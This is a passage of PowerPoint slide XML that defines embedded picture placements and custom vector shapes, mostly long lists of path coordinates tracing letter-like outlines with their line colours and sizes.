          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="70663" y="3397237"/>
              <a:ext cx="2495100" cy="1694159"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="object 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="62801" y="3390544"/>
              <a:ext cx="2505075" cy="1703705"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2505075" h="1703704">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2504630" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2504630" y="1703679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1703679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="68" name="object 68"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId20" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="166032" y="3804434"/>
              <a:ext cx="990488" cy="149570"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="object 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="311372" y="3807002"/>
              <a:ext cx="298450" cy="145415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="20421" y="27571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="88963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40970" y="88963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20535" y="27571"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="221068" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="293179" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293839" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294436" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294957" y="558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295478" y="927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295922" y="1574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="9372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="11607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297421" y="13690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294957" y="22377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294436" y="22783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293839" y="22986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293179" y="22986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="22986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285254" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285915" y="58267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286537" y="58470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287096" y="58877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287655" y="59283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289318" y="64236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289509" y="65684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="67449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="69545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289598" y="71691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289509" y="73482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289318" y="74891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289140" y="76314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287096" y="80136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286537" y="80517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285915" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285254" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="80695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241604" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293623" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294297" y="121437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="130784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="132943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297980" y="135102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294297" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293623" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221068" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218617" y="144437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216547" y="143713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214871" y="142265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213194" y="140804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="138442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="135166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="9258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212356" y="5994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213194" y="3632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214871" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216547" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218617" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221068" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="298450" h="145414">
                  <a:moveTo>
                    <a:pt x="115912" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183883" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184556" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185153" y="203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185674" y="609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186194" y="1015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186664" y="1689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187070" y="2616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187477" y="3555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187782" y="4800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="6362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188150" y="7924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="9817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="12052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188239" y="14287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188150" y="16167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="17691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187782" y="19215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185674" y="23329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185153" y="23774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184556" y="24002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183883" y="24002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="24002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180987" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181660" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184162" y="65303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184581" y="66192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184873" y="67386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185064" y="68872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185242" y="70357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="72212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="74447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="76682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184162" y="83718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183756" y="84683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183299" y="85369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182778" y="85775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182257" y="86194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181660" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180987" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="140195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="141008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136448" y="141719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136004" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135559" y="142913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134759" y="143408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133604" y="143827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132448" y="144233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130949" y="144551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129082" y="144767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127228" y="144995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124840" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121945" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119113" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116751" y="144995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114846" y="144767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112953" y="144551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107937" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107441" y="141719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="141008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="140195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="9258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="5994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108038" y="3632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109715" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111391" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113461" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115912" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="10668">
              <a:solidFill>
                <a:srgbClr val="4579B8"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70" name="object 70"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId21" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="629646" y="3800995"/>
              <a:ext cx="532206" cy="156451"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="object 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="166033" y="3804437"/>
              <a:ext cx="234315" cy="149860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="234315" h="149860">
                  <a:moveTo>
                    <a:pt x="166204" y="1892"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170599" y="1892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174104" y="1955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185915" y="4686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186550" y="5499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187083" y="6616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187528" y="8039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232181" y="136067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233070" y="138747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233629" y="140868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233857" y="142430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234073" y="143992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233781" y="145160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232956" y="145935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232143" y="146723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230695" y="147205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228612" y="147396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226529" y="147573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223659" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220014" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216217" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203936" y="145440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203492" y="144843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203123" y="144068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202819" y="143090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193116" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138861" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129705" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129412" y="143357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129019" y="144233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128536" y="144932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128054" y="145643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127279" y="146202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126199" y="146608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125120" y="147015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123596" y="147294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121615" y="147446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119646" y="147599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117055" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113855" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110439" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107759" y="147561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105829" y="147332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103885" y="147116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102552" y="146570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101803" y="145719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101066" y="144868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100799" y="143649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101028" y="142087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101244" y="140525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147231" y="7696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151650" y="2844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152946" y="2438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154749" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157060" y="2057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159359" y="1955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162420" y="1892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166204" y="1892"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="234315" h="149860">
                  <a:moveTo>
                    <a:pt x="50901" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54317" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57746" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61163" y="774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64592" y="1295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78689" y="5918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81000" y="7023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84772" y="10604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85039" y="11125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="18821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="20764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="22910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85890" y="24739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85775" y="26225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85661" y="27711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85483" y="28943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85217" y="29908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84962" y="30873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84594" y="31584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84099" y="32029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83616" y="32473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82969" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82156" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81330" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80035" y="32181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78244" y="31140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76453" y="30098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74269" y="28968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71653" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69049" y="26504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66039" y="25387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62623" y="24383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59194" y="23380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55435" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51346" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48145" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45351" y="23266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42976" y="24053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40589" y="24828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38595" y="25907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36995" y="27292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35394" y="28663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34213" y="30314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33426" y="32257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32651" y="34188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="36233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="38392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="41592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41909" y="52958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44856" y="54787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48183" y="56502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51904" y="58089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55625" y="59689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87503" y="80568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="97891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="103695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="111277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78574" y="138010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73748" y="141846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68084" y="144729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61607" y="146672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55143" y="148602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48221" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40855" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35864" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31229" y="149161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26949" y="148335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22682" y="147523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2679" y="138404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="137439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015" y="136042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609" y="134226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="132397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="116751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282" y="115785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="115100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2285" y="114693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844" y="114274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3492" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4241" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5283" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6756" y="114693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8648" y="115912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10540" y="117144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12979" y="118503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15963" y="119989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18935" y="121475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22491" y="122834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26619" y="124066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30746" y="125298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35534" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40957" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44538" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57759" y="120992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59728" y="119430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61239" y="117500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62280" y="115188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63322" y="112877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="110312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="107492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="104216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62953" y="101409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61163" y="99059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59385" y="96723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57061" y="94627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54190" y="92811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51320" y="90982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48069" y="89280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44424" y="87680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40779" y="86080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6921" y="61467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="47663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="41630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="34709"/>
                  </a:lnTo>
                  <a:lnTo>
